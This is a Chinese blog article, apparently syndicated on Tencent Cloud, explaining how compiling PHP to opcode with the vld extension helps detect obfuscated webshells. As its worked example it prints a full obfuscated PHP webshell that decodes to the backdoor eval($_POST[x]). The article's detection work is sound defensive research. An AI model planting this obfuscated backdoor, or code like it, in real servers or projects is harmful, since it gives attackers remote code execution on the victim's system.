专栏首页湛卢工作室opcode在webshell检测中的应用

opcode在webshell检测中的应用

传统的webshell静态检测,通过匹配特征码,特征值,危险函数函数来查找WebShell的方法,只能查找已知的WebShell,并且误报率漏报率会比较高。而PHP这种灵活的语言可以有非常多的绕过检测的方式,经过研究测试,opcode可以作为静态分析的辅助手段,快速精确定位PHP脚本中可控函数及参数的调用,从而提高检测的准确性,也可以进一步利用在人工智能的检测方法中,可以用opcode做特征工程。

0x01 什么是opcode

当PHP脚本被Zend Engine解析的时候,Zend Engine会对脚本进行词法、语法分析,然后编译成opcode来执行,类似JVM中的字节码(byte codes),只不过opcode不会像class文件那种存在磁盘,而是在内存中直到PHP的生命周期结束。

我们可以通过PHP扩展vld来查看PHP脚本的opcode,vld项目地址:http://pecl.php.net/package/vld

0x02 读懂opcode

下面我们用vld生成一段opcode看看。PHP脚本如下:

<?php
   echo "hello world";
?>

我们用vld生成opcode:

php -dvld.active=1  -dvld.execute=0 test.php  

如上为VLD输出的PHP代码生成的中间代码的信息,说明如下:

  • Branch analysis from position 这条信息多在分析数组时使用;
  • Return found 是否返回,这个基本上有都有;
  • filename 分析的文件名;
  • function name 函数名,针对每个函数VLD都会生成一段如上的独立的信息,这里显示当前函数的名称;
  • number of ops 生成的操作数;
  • compiled vars 编译期间的变量,这些变量是在PHP5后添加的,它是一个缓存优化。这样的变量在PHP源码中以IS_CV标记;

这段opcode的意思是echo helloworld 然后return 1。

0x03 opcode在webshell检测中的运用

当检测经过混淆加密后的php webshell的时候,最终还是调用敏感函数,比如eval、system等等。我们可以将其转化为opcode,再检测opcode是否进行了敏感函数调用。举个例子:

<?php
$__C_C="WlhaaGJDZ2tYMUJQVTFSYmVGMHBPdz09";
$__P_P="abcdefghijklmnopqrstuvwxyz";
$__X_X="123456789";
$__O_O=$__X_X[5].$__X_X[3]."_";
$__B_B=$__P_P{1}.$__P_P[0].$__P_P[18].$__P_P[4];
$__H_H=$__B_B.$__O_O.$__P_P[3].$__P_P[4].$__P_P[2].$__P_P[14].$__P_P[3].$__P_P[4];
$__E_E=$__P_P[4].$__P_P[21].$__P_P[0].$__P_P[11];
$__F_F=$__P_P[2].$__P_P[17].$__P_P[4].$__P_P[0].$__P_P[19].$__P_P[4];
$__F_F.='_'.$__P_P[5].$__P_P[20].$__P_P[13].$__P_P[2].$__P_P[19].$__P_P[8].$__P_P[14].$__P_P[13];
$_[00]=$__F_F('$__S_S',$__E_E.'("$__S_S");');
@$_[00]($__H_H($__H_H($__C_C))); //解码后即==> eval($_POST[x]);
?>  

上面的php webshell经过解码后就是一句话木马eval($_POST[x]),我们将它转化为opcode:

我们看到,木马文件最终转化成opcode的时候,调用了eval语句“INCLUDE_OR_EVAL”,而这明显是一个危险的操作,很有可能是一个webshell。

0x04 总结

在Webshell检测中,opcode可以: 1、辅助检测PHP后门/Webshell。作为静态分析的辅助手段,可以快速精确定位PHP脚本中可控函数及参数的调用。

2、帮助我们更加深入地理解PHP内核机制,使我们可以修改PHP源码或者以扩展的形式来动态检测PHP后门/Webshell。(HOOK关键危险函数,如eval, assert等,当GPC参数进入危险函数及有相关危险操作时,判定为后门/Webshell)

不过opcpde也有一定的局限性,其部署,维护成本高,消耗内存,对系统资源要求较高。

本文分享自微信公众号 - 湛卢工作室(xuehao_studio),作者:俞学浩

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2019-01-07

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 红蓝对抗——加密Webshell“冰蝎”攻防

    演练中,第一代webshell管理工具“菜刀”的攻击流量特征明显,容易被安全设备检测到,攻击方越来越少使用,加密webshell正变得越来越流行,由于流量加...

    tinyfisher
  • 冰蝎3.0简要分析

    冰蝎3.0 Beta 2今天发布,和v2.1相比,最重要的变化就是“去除动态密钥协商机制,采用预共享密钥,全程无明文交互,密钥格式为md5("admin...

    tinyfisher
  • Docker入门&漏洞测试环境搭建

    Docker是一个开源的应用容器引擎,基于 Go语言,并遵从Apache2.0协议开源。 Docker可以让开发者打包他们的应用以及依赖包到一个轻量级、可移植的...

    tinyfisher
  • 谁都用过的神技 为什么说重启能解决90%的问题?

    都说人生三大法宝:“多喝热水”,“记得吃药”,“重启一下试试”,重启已经成为了当代人必备的生活技能。作为新时代的有为青年,自从家里购入了电脑我就开始了没日没夜的...

    Java帮帮
  • 谁都用过的神技!为什么说重启能解决 90% 的问题?

    归根到底:系统治不好自己这90%的问题里100%是程序员惹的祸总结:人类的智慧结晶,居家出行必备技能

    芋道源码
  • 凭什么说重启电脑能解决90%的问题!?

    都说人生三大法宝:“多喝热水”,“吃药”,“重启一下试试”,重启已经成为了当代人必备的生活技能了。作为90后的有为青年,自从家里购入了电脑我就开始了没日没夜的上...

    小林C语言
  • PHP 对象继承原理与简单用法示例

    继承已为大家所熟知的一个程序设计特性,PHP 的对象模型也使用了继承。继承将会影响到类与类,对象与对象之间的关系。

    砸漏
  • HTML5-创建HTML文档

    HTML5中的一个主要变化是:将元素的语义与元素对其内容呈现结果的影响分开。从原理上讲这合乎情理。HTML元素负责文档内容的结构和含义,内容的呈现则由应用于元素...

    奋飛
  • JavaScript数据结构与算法-Sort

    这个方法需要 (n + 1 + n + 1) = 2n + 2 次运算。 我们把 算法需要执行的运算次数 用 输入大小n 的函数 表示,即 T(n) 。

    FinGet
  • 效率至上—全新微云

    腾讯ISUX

扫码关注云+社区

领取腾讯云代金券